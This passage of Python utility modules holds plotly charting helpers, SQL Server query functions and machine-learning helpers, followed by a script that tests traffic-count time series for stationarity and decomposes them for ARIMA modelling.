xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1 day",
step="day",
stepmode="backward"),
dict(count=3,
label="3 day",
step="day",
stepmode="backward"),
dict(count=7,
label="1 week",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if print_:
fig.write_html("figures\\time_series_{}.html".format(label1))
if show:
fig.show()
def dl_ia_utils_time_series_comparison(time_index, y1, y2, label1, label2, title):
""" Plot two time series with the same time index
:param time_index:
:param y1:
:param y2:
:param label1:
:param label2:
:return:
"""
import plotly.graph_objects as go
print_ = True
show = True
# title = 'time_series_comparison'
error = 0
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=time_index,
y=y1,
mode='markers+lines',
marker=dict(color='red'),
name='{}'.format(label1)))
fig.add_trace(go.Scatter(x=time_index,
y=y2,
mode='markers+lines',
marker=dict(color='blue'),
name='{}'.format(label2)))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=label1)
fig.update_xaxes(title_text='Time')
fig.update_layout(title=title)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1 day",
step="day",
stepmode="backward"),
dict(count=3,
label="3 day",
step="day",
stepmode="backward"),
dict(count=7,
label="1 week",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if print_:
fig.write_html("figures\\time_series_comparison_{}_{}.html".format(label1, label2))
if show:
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_time_series_comparison: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot_simple(df, var_x, var_y, label, title_):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param var_x: variable to plot in x axis
:param var_y: variable to plot in y axis
:param label: string used in the title and in the output file name
:param title_: string with the plot title
:return: error code (0: ok, 1: exception)
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{} - {}'.format(title_, label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\{}_{}_{}_{}.html".format(title_, label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot_simple: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot(df, var_x, var_y, var_color, var_size, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param var_color: variable to use as color
:param var_size: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
size=var_size,
color=var_color)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_three_timeseries(df, var_x, var_y1, var_y2, var_y3,
title_, y_label):
""" Plot two time series
:df param: data frame with data
:var_x param: string with x-axis variable. The name is used as label
:var_y1 param: string with first time series to plot. The name is used as axis label
:var_y2 param: string with second time series to plot
:var_y3 param: string with third time series to plot
:title_ param: string with the desired title. It is used to save the html file
:y_label param: string for the y-axis label
:return: error
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
# by default the figure is shown in the browser; change to 'notebook' if you want
pio.renderers.default = "browser"
show = True
print_ = True
error = 0
custom_x_axis = False
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
line=dict(width=2, dash='dot'),
marker=dict(color='black'),
mode='markers+lines',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y2],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='blue'),
name=var_y2))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y3],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='red'),
name=var_y3))
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.0,
xanchor="right",
x=0.4
))
fig.update_layout(font=dict(family="Courier New, monospace", size=16, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=y_label)
fig.update_xaxes(title_text=var_x)
fig.update_layout(title=title_)
# fig.update_layout(legend_orientation="h")
### update x ticks label
if custom_x_axis:
fig.update_layout(
xaxis=dict(
tickmode='array',
tickvals=df[var_x],
ticktext=df[var_x]
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}.html".format(title_))
return error
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_plot_three_timeseries: ' + str(exception_msg))
return error
def dl_ia_utils_plot_two_timeseries(df, var_x, var_y1, var_y2, title_, y_label):
""" Plot two time series
:df param: data frame with data
:var_x param: string with x-axis variable. The name is used as label
:var_y1 param: string with first time series to plot. The name is used as axis label
:var_y2 param: string with second time series to plot
:title_ param: string with the desired title. It is used to save the html file
:y_label param: string for the y-axis label
:return: error
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
# by default the figure is shown in the browser; change to 'notebook' if you want
pio.renderers.default = "browser"
show = True
print_ = True
error = 0
custom_x_axis = False
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
line=dict(width=2, dash='dot'),
marker=dict(color='black'),
mode='markers+lines',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y2],
line=dict(width=2, dash='dot'),
mode='markers+lines',
marker=dict(color='blue'),
name=var_y2))
fig.update_layout(legend=dict(
orientation="h",
yanchor="bottom",
y=1.0,
xanchor="right",
x=0.4
))
fig.update_layout(font=dict(family="Courier New, monospace", size=16, color="#7f7f7f"))
fig.update_layout(showlegend=True)
fig.update_yaxes(title_text=y_label)
fig.update_xaxes(title_text=var_x)
fig.update_layout(title=title_)
# fig.update_layout(legend_orientation="h")
### update x ticks label
if custom_x_axis:
fig.update_layout(
xaxis=dict(
tickmode='array',
tickvals=df[var_x],
ticktext=df[var_x]
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}.html".format(title_))
return error
except Exception as exception_msg:
error = 1
print('(!) Error in dl_ia_utils_plot_two_timeseries: ' + str(exception_msg))
return error
def dl_ia_utils_plot_contour(df, title, x_label, y_label):
"""
:return:
"""
import plotly.graph_objects as go
import plotly.io as pio
import plotly.express as px
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
# by default the figure is shown in the browser; change to 'notebook' if you want
pio.renderers.default = "browser"
try:
fig = go.Figure(data=
go.Contour(
z=df.values,
x=list(range(df.shape[1])), # horizontal axis
y=list(range(df.shape[0])), # vertical axis
line_smoothing=0.85,
contours=dict(
showlabels=True, # show labels on contours
start=0,
end=18,
size=1)
))
fig.update_layout(title=title,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.index
),
xaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.columns,
tickangle=90,
tickfont=dict(size=9)
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=10))
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_contour: ' + str(exception_msg))
def dl_ia_utils_plot_heatmap(df, title, x_label, y_label, x_ticks, y_ticks):
""" Plot heatmap
:df param: dataframe to plot
:title param: string with the title
:x_label param: string with the label of the x axis
:y_label param: string with the label of the y axis
:x_ticks param: list with the ticks of the x axis
:y_ticks param: list with the ticks of the y axis
:return:
"""
import plotly.express as px
import numpy as np
from IA_resources.dl_ia_utils import dl_ia_utils_config_plotly
dl_ia_utils_config_plotly()
try:
fig = px.imshow(df.values)
fig.update_layout(title=title,
yaxis_title=y_label,
xaxis_title=x_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(y_ticks)),
ticktext=y_ticks
),
xaxis=dict(
tickvals=np.arange(0, len(x_ticks)),
ticktext=x_ticks
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=11))
fig.show()
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_heatmap: ' + str(exception_msg))
def dl_ia_utils__plot_line(df, var_x, var_y, var_color, x_label, y_label, title_):
""" Plot line plot from dataframe
:param df:
:param var_x:
:param var_y:
:param x_label:
:param y_label:
:param title_:
"""
import plotly.express as px
if var_color is None:
fig = px.line(df,
x=var_x,
y=var_y)
else:
fig = px.line(df,
x=var_x,
y=var_y,
color=var_color)
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=14))
fig.show()
def dl_ia_utils_plot_scatter(df, var_x, var_y, var_color, x_label, y_label, title_):
""" Plot scatter plot from dataframe
:param df:
:param var_x:
:param var_y:
:param x_label:
:param y_label:
:param title_:
"""
import plotly.express as px
if var_color is None:
fig = px.scatter(df,
x=var_x,
y=var_y)
else:
fig = px.scatter(df,
x=var_x,
y=var_y,
color=var_color)
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=14))
fig.show()
def dl_ia_utils_plot_contour(df, title, x_label, y_label):
"""
:return:
"""
import plotly.graph_objects as go
import numpy as np
fig = go.Figure(data=
go.Contour(
z=df.values,
x=list(range(df.shape[1])), # horizontal axis
y=list(range(df.shape[0])), # vertical axis
line_smoothing=0.85,
contours=dict(
showlabels=True, # show labels on contours
start=0,
end=18,
size=1)
))
fig.update_layout(title=title,
xaxis_title=x_label,
yaxis_title=y_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.index
),
xaxis=dict(
tickvals=np.arange(0, len(df.index)),
ticktext=df.columns,
tickangle=90,
tickfont=dict(size=9)
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=10))
fig.show()
def dl_ia_utils_plot_heatmap(df, title, x_label, y_label, x_ticks, y_ticks):
""" Plot heatmap
:df param: dataframe to plot
:title param: string with the title
:x_label param: string with the label of the x axis
:y_label param: string with the label of the y axis
:x_ticks param: list with the ticks of the x axis
:y_ticks param: list with the ticks of the y axis
:return:
"""
import plotly.express as px
import numpy as np
fig = px.imshow(df.values)
fig.update_layout(title=title,
yaxis_title=y_label,
xaxis_title=x_label)
fig.update_layout(
yaxis=dict(
tickvals=np.arange(0, len(y_ticks)),
ticktext=y_ticks
),
xaxis=dict(
tickvals=np.arange(0, len(x_ticks)),
ticktext=x_ticks
)
)
fig.update_layout(
font=dict(
family="Courier New, monospace",
color="RebeccaPurple",
size=11))
fig.show()
def dl_ia_utils_plot_timeseries_with_slider(df, var_x, var_y, title):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
mode='markers+lines',
marker=dict(color='red'),
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title=title,
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1d",
step="day",
stepmode="backward"),
dict(count=3,
label="3d",
step="day",
stepmode="backward"),
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\timeseries_with_slider_{}.html".format(var_y))
def dl_ia_utils_plot_timeseries(df, var_x, var_y, title_):
"""
:param df:
:param var_x:
:param var_y:
:return:
"""
import plotly.graph_objects as go
show = True
print_ = True
error = 0
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y],
marker=dict(color='red'),
mode='markers+lines',
name=var_y))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{}'.format(title_),
xaxis_title=var_x,
yaxis_title=var_y,
showlegend=True
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}.html".format(title_, var_y))
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_timeseries : {} '.format(exception_msg))
error = 1
return error
def dl_ia_utils_plot_two_timeseries(df, var_x, var_y1, var_y2, title_, x_label, y_label):
"""
:param df:
:param var_x:
:param var_y1:
:param var_y2:
:return:
"""
import plotly.graph_objects as go
# NOTE: the x_label / y_label arguments passed by the caller are used for the axis titles
show = True
print_ = True
try:
fig = go.Figure()
fig.add_trace(go.Scatter(x=df[var_x],
y=df[var_y1],
marker=dict(color='red'),
mode='markers',
name=var_y1))
fig.add_trace(go.Scatter(x=df[var_x],
marker=dict(color='blue'),
y=df[var_y2],
mode='markers+lines',
name=var_y2))
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title=title_,
xaxis_title=x_label,
yaxis_title=y_label,
showlegend=True
)
# Add range slider
fig.update_layout(
xaxis=go.layout.XAxis(
rangeselector=dict(
buttons=list([
dict(count=1,
label="1d",
step="day",
stepmode="backward"),
dict(count=3,
label="3d",
step="day",
stepmode="backward"),
dict(count=7,
label="1w",
step="day",
stepmode="backward"),
])
),
rangeslider=dict(
visible=True
),
type="date"
)
)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}_{}.html".format(title_, var_y1, var_y2))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_two_timeseries : {} '.format(exception_msg))
def dl_ia_utils_plot_line(df, var_x, var_y, var_group, title_):
"""
:param df:
:param var_x:
:param var_y:
:param var_group:
:return:
"""
import plotly.express as px
show = True
print_ = True
try:
fig = px.line(df,
x=var_x,
y=var_y,
color=var_group,
)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='{} - {}'.format(title_, var_y))
fig.update_layout(showlegend=True)
if show:
fig.show()
if print_:
fig.write_html("figures\\{}_{}_{}.html".format(title_, var_x, var_y))
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_line : {} '.format(exception_msg))
def dl_ia_utils_plot_scatterplot_simple(df, var_x, var_y, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param label: string used in the title and in the output file name
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot_simple: ' + str(exception_msg))
error = 1
return error
def dl_ia_utils_plot_scatterplot(df, var_x, var_y, var_color, var_size, label):
""" Produce a simple scatter plot with plotly
:param df: dataframe that contains the variables
:param variable_x: variable to plot in x axis
:param variable_y: variable to plot in y axis
:param var_color: variable to use as color
:param var_size: variable to use as size
:return:
"""
import plotly.express as px
print_ = True
show = True
error = 0
try:
fig = px.scatter(df,
x=var_x,
y=var_y, # marker = dict(color='blue')
size=var_size,
color=var_color)
fig.update_xaxes(title_text=var_x)
fig.update_yaxes(title_text=var_y)
fig.update_layout(font=dict(family="Courier New, monospace", size=18, color="#7f7f7f"))
fig.update_layout(title='Scatterplot - {}'.format(label))
fig.update_layout(showlegend=True)
if print_:
fig.write_html("figures\\scatterplot_{}_{}_{}.html".format(label, var_x, var_y))
if show:
fig.show()
return error
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_plot_scatterplot: ' + str(exception_msg))
error = 1
return error
#############################################################
# --------------- DATA BASE ---------------------------------#
#############################################################
def dl_ia_query_get_data(query, ddbb_settings):
"""
this function performs the connection to the HORUS SQL Server database and executes the query provided
:param query: string with the query
:param ddbb_settings: Dictionary with DB connection settings (driver, server, database, schema,
user and pass)
:return error:
"""
import pyodbc
import pandas as pd
error = 0
try:
# print('define parameters')
# for a in db_settings_PRO.keys():
# print(a,':', db_settings_PRO[a])
### define connection to DDBB
driver = ddbb_settings['driver']
server = ddbb_settings['server']
database = ddbb_settings['database']
schema = ddbb_settings['schema']
user = ddbb_settings['user']
password = ddbb_settings['pass']
port = ddbb_settings['port']
except Exception as exception_msg:
print('(!) Error in dl_ia_query_get_data: ' + str(exception_msg))
error = 1
df_input = []
return error, df_input
if error == 0:
try:
print(
'Loading data from server:[{}] database:[{}] schema:[{}] port : [{}] '.format(server, database, schema,
port))
### connect to DDBB and get the last 6 hours of data
# sql_conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
# sql_conn = pyodbc.connect('DRIVER={SQL Server Native Client RDA 11.0};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
sql_conn_str = 'DRIVER={};SERVER={},{};DATABASE={};UID={};PWD={}'.format(driver, server, port, database,
user, password)
# print(sql_conn_str)
# sql_conn = pyodbc.connect('DRIVER=' + driver +';SERVER=' + server + ',' + port + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password)
sql_conn = pyodbc.connect(sql_conn_str)
df_input = pd.read_sql(query, sql_conn)
sql_conn.close()
return error, df_input
except Exception as exception_msg:
print('(!) Error in dl_ia_query_get_data: ' + str(exception_msg))
error = 2
df_input = []
return error, df_input
def dl_ia_utils_initialize_engine(ddbb_settings):
""" Initialize an SQL ALchemy engine
:param ddbb_settings: DIctionary with driver user, pass, server, database, schema
:param engine:
"""
from sqlalchemy.engine import create_engine
try:
engine = create_engine("{}://{}:{}@{}:{}/{}".format(ddbb_settings['driver'],
ddbb_settings['user'],
ddbb_settings['pass'],
ddbb_settings['server'],
ddbb_settings['port'],
ddbb_settings['database']))
print('Engine successfully initialized')
return engine
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_initialize_engine: {}'.format(exception_msg))
engine = []
return engine
def dl_ia_utils_query_get_data(query, ddbb_settings):
"""
this function performs the connection to the HORUS SQL Server database and executes the query provided
:param query: string with the query
:param ddbb_settings: Dictionary with DB connection settings (driver, server, database, schema,
user and pass)
:return error:
"""
import pyodbc
import pandas as pd
error = 0
try:
# print('define parameters')
# for a in db_settings_PRO.keys():
# print(a,':', db_settings_PRO[a])
### define connection to DDBB
driver = ddbb_settings['driver']
server = ddbb_settings['server']
database = ddbb_settings['database']
schema = ddbb_settings['schema']
user = ddbb_settings['user']
password = ddbb_settings['pass']
port = ddbb_settings['port']
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_query_get_data: ' + str(exception_msg))
error = 1
df_input = []
return error, df_input
if error == 0:
try:
print(
'Loading data from server:[{}] database:[{}] schema:[{}] port : [{}] '.format(server, database, schema,
port))
### connect to DDBB and get the last 6 hours of data
# sql_conn = pyodbc.connect('DRIVER={ODBC Driver 13 for SQL Server};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
# sql_conn = pyodbc.connect('DRIVER={SQL Server Native Client RDA 11.0};SERVER=' + server + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password + 'Trusted_Connection=yes')
sql_conn_str = 'DRIVER={};SERVER={},{};DATABASE={};UID={};PWD={}'.format(driver, server, port, database,
user, password)
# print(sql_conn_str)
# sql_conn = pyodbc.connect('DRIVER=' + driver +';SERVER=' + server + ',' + port + ';DATABASE=' + database + ';UID=' + user + ';PWD=' + password)
sql_conn = pyodbc.connect(sql_conn_str)
df_input = pd.read_sql(query, sql_conn)
sql_conn.close()
return error, df_input
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_query_get_data: ' + str(exception_msg))
error = 2
df_input = []
return error, df_input
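# --- Hedged usage sketch (not part of the original module) ---
# All connection values below are placeholders chosen for illustration only; the
# real driver, host and credentials depend on the target SQL Server instance,
# and pyodbc must be installed for the call to succeed.
if __name__ == '__main__':
    example_ddbb_settings = {'driver': '{ODBC Driver 17 for SQL Server}',
                             'server': 'my-server.example.com',
                             'port': '1433',
                             'database': 'my_database',
                             'schema': 'dbo',
                             'user': 'my_user',
                             'pass': 'my_password'}
    example_query = 'SELECT TOP 10 * FROM dbo.my_table'
    error, df_input = dl_ia_utils_query_get_data(example_query, example_ddbb_settings)
    if error == 0:
        print(df_input.head())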
#############################################################
# ------- MACHINE LEARNING ---------------------------------#
#############################################################
def dl_ia_utils_create_lagged_variables(df, variable, number_lags):
""" create lagged versions of the variable in a dataframe in which each row is an observation
:param df:
:param number_lags:
:return:
"""
# number_lags is taken from the function argument
for lag in range(1, number_lags + 1):
df[variable + '_lag_' + str(lag)] = df[variable].shift(lag)
# if you want numpy arrays with no null values:
df.dropna(inplace=True)
return df
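# Hedged usage sketch for the helper above (the column name and sizes are illustrative):
if __name__ == '__main__':
    import pandas as pd
    df_demo = pd.DataFrame({'TOTAL_VEHICULOS': range(30)})
    df_demo = dl_ia_utils_create_lagged_variables(df_demo, 'TOTAL_VEHICULOS', 3)
    print(df_demo.columns.tolist())  # original column plus TOTAL_VEHICULOS_lag_1 ... _lag_3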
def dl_ia_utils_anomaly_detection_univariate(df, variable):
""" Produce anomaly detection with forest isolation with univariate data
:param df:
:param variable:
"""
from sklearn.ensemble import IsolationForest
import numpy as np
import pandas as pd
error = 0
try:
# instantiate model
isolation_forest = IsolationForest(n_estimators=200)
# fit model
isolation_forest.fit(df[variable].values.reshape(-1, 1))
xx = np.linspace(df[variable].min(), df[variable].max(), len(df)).reshape(-1, 1)
anomaly_score = isolation_forest.decision_function(xx)
# make prediction
outlier = isolation_forest.predict(xx)
df_out = pd.DataFrame({'X': xx.T.ravel(), 'outlier': outlier.ravel(), 'anomaly_score': anomaly_score.ravel()})
lower_limit_outlier = df_out[df_out['outlier'] == -1]['X'].min()
upper_limit_outlier = df_out[df_out['outlier'] == -1]['X'].max()
print('lower limit outlier:{}'.format(lower_limit_outlier))
print('upper limit outlier:{}'.format(upper_limit_outlier))
return error, df_out
# plot
if 0 == 1:
import matplotlib.pyplot as plt
plt.figure(figsize=(10, 4))
plt.plot(xx, anomaly_score, label='anomaly score')
plt.fill_between(xx.T[0],
np.min(anomaly_score),
np.max(anomaly_score),
where=outlier == -1,
color='r',
alpha=.4,
label='outlier region')
plt.legend()
plt.ylabel('anomaly score')
plt.xlabel('Sales')
plt.show();
except Exception as exception_msg:
print('(!) Error in dl_ia_utils_anomaly_detection_univariate: ' + str(exception_msg))
error = 1
return error
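# Hedged usage sketch: a synthetic univariate series with two obvious outliers
# (the column name 'value' is illustrative, not from the original module).
if __name__ == '__main__':
    import numpy as np
    import pandas as pd
    rng = np.random.RandomState(42)
    df_demo = pd.DataFrame({'value': np.concatenate([rng.normal(10, 1, 200), [25.0, -5.0]])})
    err, df_scores = dl_ia_utils_anomaly_detection_univariate(df_demo, 'value')
    if err == 0:
        print(df_scores.head())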
def dl_ia_utils_variability_captured(y, y_hat):
""" function to calculate the varibility captured or explained variance
:param y:
:param y_hat:
:return:
"""
import numpy as np
return round(1 - np.var(y_hat - y) / np.var(y_hat), 3)
def dl_ia_utils_mape(y_true, y_pred):
""" function to calculate the Mean Absolute Percentage Error
Zero values are treated by vertical translation
:param y:
:param y_hat:
:return:
"""
import numpy as np
from IA_resources.dl_ia_utils import dl_ia_utils_vertical_translation
y_true = dl_ia_utils_vertical_translation(y_true)  # vertical translation +1
y_pred = dl_ia_utils_vertical_translation(y_pred)  # vertical translation +1
y_true, y_pred = np.array(y_true), np.array(y_pred)
return round(np.mean(np.abs((y_true - y_pred) / y_true)) * 100, 3)
def dl_ia_utils_regression_evaluation(y_hat, y):
""" Evaluate regression metrics
:param y_hat:
:param y:
:return:
"""
from IA_resources.dl_ia_utils import dl_ia_utils_variability_captured
from IA_resources.dl_ia_utils import dl_ia_utils_mape
from sklearn.metrics import r2_score, mean_absolute_error, explained_variance_score, mean_squared_error
R2 = round(r2_score(y_hat, y), 3)
MAE = round(mean_absolute_error(y_hat, y), 3)
MSE = round(mean_squared_error(y_hat, y), 3)
EV = round(explained_variance_score(y_hat, y), 3)
VC = round(dl_ia_utils_variability_captured(y_hat, y), 3)
errors = abs(y_hat - y)
# MAPE = 100 * np.mean(errors / y)
MAPE = dl_ia_utils_mape(y_hat, y)
accuracy = 100 - MAPE
print('Regression Metrics')
print('R2 = {:0.2f}'.format(R2))
print('EV = {:0.2f}'.format(EV))
print('Variability captured = {:0.2f}'.format(VC))
print('MSE = {:0.2f}'.format(MSE))
print('MAE = {:0.2f}'.format(MAE))
print('MAPE: {:0.4f} %'.format(MAPE))
print('Accuracy = {:0.2f} %.'.format(accuracy))
return R2, MAE, MSE, EV, VC
``` |
{
"source": "joanvelro/repo_B",
"score": 3
} |
#### File: dataset_utils/data_profiling/arima_parameter_tunning.py
```python
import matplotlib.pyplot as plt
from numpy import log
from statsmodels.tsa.stattools import adfuller
from statsmodels.tsa.stattools import kpss
from statsmodels.graphics.tsaplots import plot_acf
from statsmodels.graphics.tsaplots import plot_pacf
from statsmodels.tsa.seasonal import seasonal_decompose
import pandas as pd
from scipy import stats
def is_stationary_with_adf(data, significance_level=0.01):
"""Decide if the given time series is stationary using ADF test."""
X = data.values
result_test = adfuller(X, regression='c', autolag='BIC')
p_value = result_test[1]
adf_stats = result_test[0]
print("ADF p-value: {:0.5f}".format(p_value))
print("ADF Statistic: {:0.5f}".format(adf_stats))
print('Critical Values:')
for key, value in result_test[4].items():
print('\t%s: %.3f' % (key, value))
return p_value < significance_level
def is_stationary_with_kpss(data, significance_level=0.05):
"""Decide if the given time series is stationary using KPSS test."""
result_test = kpss(data, regression='c')
p_value = result_test[1]
kpss_stats = result_test[0]
print("KPSS p-value: {:0.5f}".format(p_value))
print("KPSS Statistic: {:0.5f}".format(kpss_stats))
print('Critical Values:')
for key, value in result_test[3].items():
print('\t%s: %.3f' % (key, value))
return p_value > significance_level
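# Hedged usage sketch (synthetic data, illustrative only): a pure random walk
# should be flagged as non-stationary by ADF and KPSS, while its first difference
# should come out stationary.
if __name__ == '__main__':
    import numpy as np
    rng = np.random.RandomState(0)
    random_walk = pd.Series(rng.normal(size=500)).cumsum()
    print("Random walk stationary by ADF:", is_stationary_with_adf(random_walk))
    print("Random walk stationary by KPSS:", is_stationary_with_kpss(random_walk))
    print("First difference stationary by ADF:", is_stationary_with_adf(random_walk.diff().dropna()))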
def is_stationary_visual_check(data, value, seasons, save_to=None):
seasonal_mean = data.rolling(window=seasons).mean()
seasonal_std = data.rolling(window=seasons).std()
fig, ax = plt.subplots(figsize=(18, 6))
data.plot(x="FECHA", y=value, ax=ax, label="observed", c='lightgrey')
seasonal_mean.plot(x="FECHA", y=value, ax=ax, label="seasonal (rolling) mean", c='red')
seasonal_std.plot(x="FECHA", y=value, ax=ax, label="seasonal (rolling) std", c='blue')
plt.legend(loc='best')
plt.title('Seasonal Mean & Standard Deviation')
if save_to is not None:
plt.savefig(save_to)
plt.show()
def correct_non_stationarities(data, seasons):
data['boxcox'], lmbda = stats.boxcox(data['TOTAL_VEHICULOS'])
data["fd"] = data.boxcox - data.boxcox.shift(1)
data["stationary"] = data.fd - data.fd.shift(seasons)
print("Stationary by ADF: {}".format(
"yes" if is_stationary_with_adf(data.stationary.dropna()) else "no"), '\n')
print("Stationary by KPSS: {}".format(
"yes" if is_stationary_with_kpss(data.stationary.dropna()) else "no"))
is_stationary_visual_check(data['stationary'], value="TOTAL_VEHICULOS", seasons=96)
fig, ax = plt.subplots(figsize=(18, 6))
ax = fig.add_subplot(211)
fig = plot_acf(data.stationary.dropna(inplace=False).iloc[seasons + 96:], lags=96, ax=ax)
ax = fig.add_subplot(212)
fig = plot_pacf(data.stationary.dropna(inplace=False).iloc[seasons + 1:], lags=96, ax=ax)
plt.show()
return data
def decomposition_time_series(data):
# Time series decomposition
decompfreq = 96 #
model = 'additive'
decomposition = seasonal_decompose(
data.interpolate("linear"),
freq=decompfreq,
model=model)
trend = decomposition.trend
seasonal = decomposition.seasonal
residual = decomposition.resid
fig, ax = plt.subplots(figsize=(18, 6))
data.plot(x="FECHA", y="TOTAL_VEHICULOS", ax=ax, label="observed", c='lightgrey')
trend.plot(ax=ax, label="trend")
plt.legend(loc='upper left')
fig, ax = plt.subplots(figsize=(18, 4))
seasonal.plot(ax=ax, label="seasonality")
plt.legend(loc='lower left')
fig, ax = plt.subplots(figsize=(18, 4))
residual.plot(ax=ax, legend="residual")
plt.legend(loc='upper left')
plt.show()
def day_plot(data):
day_zoom_range = data[(data['FECHA'] >= '2019-01-24 00:00:00') & (data['FECHA'] < '2019-01-25 00:00:00')].index
